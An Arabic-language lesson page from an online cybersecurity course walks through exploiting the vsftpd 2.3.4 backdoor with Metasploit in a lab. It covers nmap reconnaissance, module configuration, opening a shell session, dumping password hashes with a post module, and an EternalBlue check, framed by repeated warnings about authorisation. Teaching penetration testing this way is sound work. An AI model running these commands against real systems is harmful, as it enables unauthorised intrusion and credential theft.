Cyber Security Academy · درس

استغلال ثغرة معروفة

استخدم وحدة استغلال ضد هدف معرض للخطر في مختبر، ثم فسّر مخرجات الجلسة.

الدرس 2 من 413 خطوة

استغلال ثغرة معروفة درس مجاني في Cyber Security Academy على CoddyKit. هذا هو الدرس 2 من أصل 4. يمكنك قراءة الدرس كاملاً أدناه مجاناً — ثم تمرن عليه مباشرة في المتصفح باستخدام محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7. هذا الدرس جزء من مسار التعلم في Cyber Security Academy، وتقدمك يتزامن عبر الويب وتطبيق CoddyKit. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.

الأخلاقيات والتفويض أولًا

لا يكون الاستغلال قانونيًا إلا ضد الأنظمة التي تملكها أو التي حصلت على تفويض كتابي صريح لاختبارها. جميع الأمثلة هنا مخصصة للبيئات المختبرية المصرح بها. يُعد الاستغلال غير المصرح به جريمة جنائية.

توصية بإعداد المختبر

استخدم آلات افتراضية مصممة لتكون عرضة للثغرات، مثل Metasploitable2/3 وDVWA وآلات VulnHub، أو استخدم HackTheBox/TryHackMe للتدريب القانوني. لا تختبر أبدًا على أنظمة الإنتاج أو الأنظمة الواقعية دون وثيقة نطاق موقعة.

# Download Metasploitable2
# https://sourceforge.net/projects/metasploitable/

# Or use VulnHub
# https://www.vulnhub.com/

# Network: host-only adapter (isolated)

الاستطلاع قبل الاستغلال

أجرِ الحصر دائمًا قبل الاستغلال. تعرّف على إصدار الخدمة الدقيق ونظام التشغيل والسياق قبل اختيار عملية الاستغلال. الإصدار الخاطئ يعني فشل الاستغلال أو تعطل النظام.

sudo nmap -sV -O 192.168.1.100

# Identify:
# - OS version
# - Service + exact version
# - Open ports
# Then search Metasploit for matching exploit

اختيار عملية الاستغلال المناسبة

ابحث حسب اسم الخدمة وإصدارها. فضّل الوحدات المصنفة Excellent أو Great. اقرأ info للتأكد من تطابق المنصة المستهدفة ونطاق الإصدار.

msf6 > search vsftpd 2.3.4
# exploit/unix/ftp/vsftpd_234_backdoor
# Rank: Excellent

msf6 > info exploit/unix/ftp/vsftpd_234_backdoor

تهيئة عملية الاستغلال وتشغيلها

اضبط RHOSTS (الهدف البعيد)، وLHOST (عنوان IP الخاص بك للاتصالات العكسية)، وLPORT (منفذ الاستماع)، وحدد حمولة، ثم شغّلها. راقب إنشاء الجلسة أو ظهور رسائل الخطأ.

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload cmd/unix/interact
msf6 > run

# [*] Command shell session 1 opened

تفسير النتائج

يفتح الاستغلال الناجح جلسة. وتعرض عمليات الاستغلال الفاشلة رسائل خطأ: رفض الاتصال (المنفذ غير مفتوح)، فشل الاستغلال (الإصدار خاطئ)، عدم إنشاء جلسة (فشل اتصال الحمولة بالعودة).

# Success:
[*] Started reverse TCP handler
[*] Command shell session 1 opened

# Failure:
[-] Exploit aborted: Bad return value from check
[-] Exploit failed: No session was created

التفاعل مع جلسة

بعد الاستغلال، تفاعل مع الجلسة باستخدام sessions -i . توفر جلسات shell الأساسية لسطر الأوامر طرفية، بينما توفر جلسات Meterpreter واجهة API غنية.

msf6 > sessions          # list all sessions
msf6 > sessions -i 1     # interact with session 1

# Once inside:
id
whoami
ifconfig
uname -a

وضع الجلسات في الخلفية وإدارة جلسات متعددة

اضغط Ctrl+Z لوضع جلسة في الخلفية والعودة إلى msfconsole. يتيح لك ذلك إدارة جلسات متعددة أو تشغيل وحدات ما بعد الاستغلال على جلسة محددة.

# Background active session
Ctrl+Z

# List sessions
msf6 > sessions

# Run post module against session 1
msf6 > use post/linux/gather/hashdump
msf6 > set SESSION 1
msf6 > run

أمر التحقق

تطبّق العديد من وحدات الاستغلال الأمر check الذي يختبر ما إذا كان الهدف عرضة للثغرة دون استغلاله فعليًا. شغّل check دائمًا أولًا إذا كان متاحًا.

msf6 exploit(ms17_010_eternalblue) > check

# [+] 192.168.1.100:445 - The target is vulnerable.
# Or:
# [-] 192.168.1.100:445 - The target is not vulnerable.

اعتبارات موثوقية الاستغلال

قد تتسبب عمليات الاستغلال في تعطل الخدمات أو إطلاق التنبيهات أو ترك سجلات. في تقييمات بيئات الإنتاج: شغّل عمليات الاستغلال خلال فترات انخفاض حركة المرور، وضع خطة للتراجع، وتأكد من وجود نسخ احتياطية قبل تشغيل أي شيء تدميري.

توثيق الاستغلال

سجّل ما يلي: الطابع الزمني، وعنوان IP والمنفذ المستهدفين، ووحدة الاستغلال المستخدمة، ورقم CVE، والحمولة المستخدمة، والجلسة التي تم الحصول عليها، والأدلة (لقطة شاشة أو مخرجات الطرفية). هذا هو إثبات وجود الثغرة في التقرير.

تحقق سريع

ماذا يفعل الأمر "check" في Metasploit؟

ملخص: استغلال الثغرات

يتبع الاستغلال الأخلاقي مسارًا واضحًا: الحصول على تفويض كتابي، وإجراء الحصر بعناية، واختيار عملية الاستغلال المطابقة، وقراءة معلومات الوحدة، وتشغيل check أولًا إن كان متاحًا، ثم التنفيذ وتوثيق كل شيء. لا تستغل أي نظام دون تفويض — فالمهارة التقنية والحد الأخلاقي أمران لا ينفصلان.

البدء مجانًا

تعلم Cyber Security Academy مع معلم ذكاء اصطناعي — مجانًا

اكتب وقم بتشغيل أكوادك الفعلية في المتصفح، واحصل على مساعدة فورية من معلم ذكاء اصطناعي متاح 24/7، واستمر من حيث توقفت على الويب أو في التطبيق.

الدورات
76
الدروس
303

الأسئلة الشائعة

هل درس «استغلال ثغرة معروفة» مجاني؟

نعم — نص درس «استغلال ثغرة معروفة» كامل متاح مجاناً هنا على الويب. لتمرينه بشكل تفاعلي (محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7) وفتح باقي دورة Cyber Security Academy، انتقل إلى CoddyKit PRO. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.

ماذا ستتعلم في «استغلال ثغرة معروفة»؟

استخدم وحدة استغلال ضد هدف معرض للخطر في مختبر، ثم فسّر مخرجات الجلسة. تتمرن على Cyber Security Academy مع أكواد عملية تشغلها مباشرة في المتصفح، ومدرس ذكاء اصطناعي متاح 24/7 يجيب على أسئلتك أثناء عملك.

هل أحتاج إلى خبرة سابقة لأبدأ Cyber Security Academy؟

لا تُشترط خبرة سابقة. Cyber Security Academy على CoddyKit منظم للمبتدئين حتى المتقدمين، لذا يمكنك البدء من هنا أو من البداية والتقدم بسرعتك الخاصة. هذا هو الدرس 2 من أصل 4.

كم من الوقت يستغرق درس «استغلال ثغرة معروفة»؟

معظم دروس CoddyKit تستغرق حوالي 5–10 دقائق. كل منها موجز وتفاعلي، لذا تحرز تقدماً مستمراً وتستأنف من حيث توقفت عبر الويب والتطبيق.

هل يمكنني كتابة وتشغيل أكواد في درس Cyber Security Academy هذا؟

نعم. كل درس في Cyber Security Academy يتضمن محرر أكواد مدمج، لذا تكتب وتشغل أكواداً حقيقية مباشرة في متصفحك وتحصل على تعليقات فورية من الذكاء الاصطناعي — بدون إعداد محلي.

جميع الدروس في هذه الدورة

  1. بنية Metasploit وmsfconsole
  2. استغلال ثغرة معروفة
  3. الحمولات: المرحلية وغير المرحلية وMeterpreter
  4. ما بعد الاستغلال: التمحور والاستمرارية
← العودة إلى Cyber Security Academy